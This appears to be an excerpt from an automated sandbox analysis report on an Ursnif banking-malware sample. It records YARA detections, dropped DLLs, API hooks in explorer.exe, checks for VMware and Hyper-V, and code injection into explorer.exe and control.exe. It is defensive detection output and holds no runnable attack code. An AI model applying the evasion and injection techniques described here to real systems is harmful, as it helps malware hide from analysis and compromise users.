Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10003BB7 push ds; retf	0_2_10003BB8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10012FC0 push edx; ret	0_2_10012FF3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100037DC push ds; retf	0_2_10003AD0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02F6B0CB push ecx; ret	0_2_02F6B0DB

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.239593873.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239746568.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239727168.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.381854498.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.456980641.0000000001240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239703401.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.445671426.0000026AEDB20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239555043.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.641874278.0000000003B86000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.438096785.0000000001270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239627007.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239757278.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.239668974.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6620, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 5508, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 5128, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY

Hooks registry keys query functions (used to hide registry keys)

Show sources

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Modifies the export address table of user mode modules (user mode EAT hooks)

Show sources

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA9B33521C

Modifies the import address table of user mode modules (user mode IAT hooks)

Show sources

Source: explorer.exe

EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA9B335200

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Source: C:\Windows\System32\loaddll32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\control.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_10007896 rdtsc

0_2_10007896

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5186			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3748			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.dll			Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6412

Thread sleep time: -5534023222112862s >= -30000s

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02F632BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	0_2_02F632BA
Source: C:\Windows\explorer.exe	Code function: 37_2_03B70180 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,	37_2_03B70180
Source: C:\Windows\explorer.exe	Code function: 37_2_03B60C34 FindFirstFileW,	37_2_03B60C34
Source: C:\Windows\explorer.exe	Code function: 37_2_03B5A85C FindFirstFileW,DeleteFileW,FindNextFileW,	37_2_03B5A85C

Source: explorer.exe, 00000025.00000000.456781210.000000000891C000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000025.00000000.440682703.0000000003710000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000025.00000000.455716541.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000025.00000003.470402764.000000001020A000.00000004.00000040.sdmp, 44E8.bin.37.dr	Binary or memory string: gencounter Microsoft Hyper-V Gene Kernel
Source: explorer.exe, 00000025.00000003.470402764.000000001020A000.00000004.00000040.sdmp, 44E8.bin.37.dr	Binary or memory string: vmgid Microsoft Hyper-V Gues Kernel
Source: explorer.exe, 00000025.00000003.470402764.000000001020A000.00000004.00000040.sdmp, 44E8.bin.37.dr	Binary or memory string: bttflt Microsoft Hyper-V VHDP Kernel
Source: explorer.exe, 00000025.00000000.461469931.000000000DC36000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000025.00000003.470402764.000000001020A000.00000004.00000040.sdmp, 44E8.bin.37.dr	Binary or memory string: vpci Microsoft Hyper-V Virt Kernel
Source: explorer.exe, 00000025.00000000.438597559.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000025.00000000.456890873.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000025.00000000.449342670.00000000053C4000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000025.00000000.455716541.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000025.00000000.455716541.0000000008270000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000025.00000003.470402764.000000001020A000.00000004.00000040.sdmp, 44E8.bin.37.dr	Binary or memory string: storflt Microsoft Hyper-V Stor Kernel
Source: explorer.exe, 00000025.00000000.456890873.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: explorer.exe, 00000025.00000003.470452781.00000000101F0000.00000004.00000040.sdmp, 44E8.bin.37.dr	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: explorer.exe, 00000025.00000002.647622896.00000000053C4000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW;`
Source: explorer.exe, 00000025.00000000.455716541.0000000008270000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\System32\loaddll32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_10007896 rdtsc

0_2_10007896

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0122B5D0 mov eax, dword ptr fs:[00000030h]		0_2_0122B5D0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0122B6E0 mov eax, dword ptr fs:[00000030h]		0_2_0122B6E0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Changes memory attributes in foreign processes to executable or writable

Show sources

Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write

Compiles code for process injection (via .Net compiler)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.0.cs

Jump to dropped file

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 9B851580	Jump to behavior
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 9B851580
Source: C:\Windows\System32\control.exe	Thread created: unknown EIP: 9B851580

Injects code into the Windows Explorer (explorer.exe)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3472 base: EAE000 value: 00	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3472 base: 7FFA9B851580 value: EB	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3472 base: 3C30000 value: 80	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3472 base: 7FFA9B851580 value: 40	Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\System32\loaddll32.exe	Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: unknown protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Windows\System32\loaddll32.exe	Thread register set: target process: 5128	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3472	Jump to behavior
Source: C:\Windows\explorer.exe	Thread register set: target process: 4016
Source: C:\Windows\explorer.exe	Thread register set: target process: 4288
Source: C:\Windows\explorer.exe	Thread register set: target process: 4448
Source: C:\Windows\explorer.exe	Thread register set: target process: 5972
Source: C:\Windows\explorer.exe	Thread register set: target process: 5876
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3472
Source: C:\Windows\System32\control.exe	Thread register set: target process: 6904

Writes to foreign memory regions

Show sources

Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF60C6912E0	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF60C6912E0	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: EAE000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFA9B851580	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 3C30000	Jump to behavior
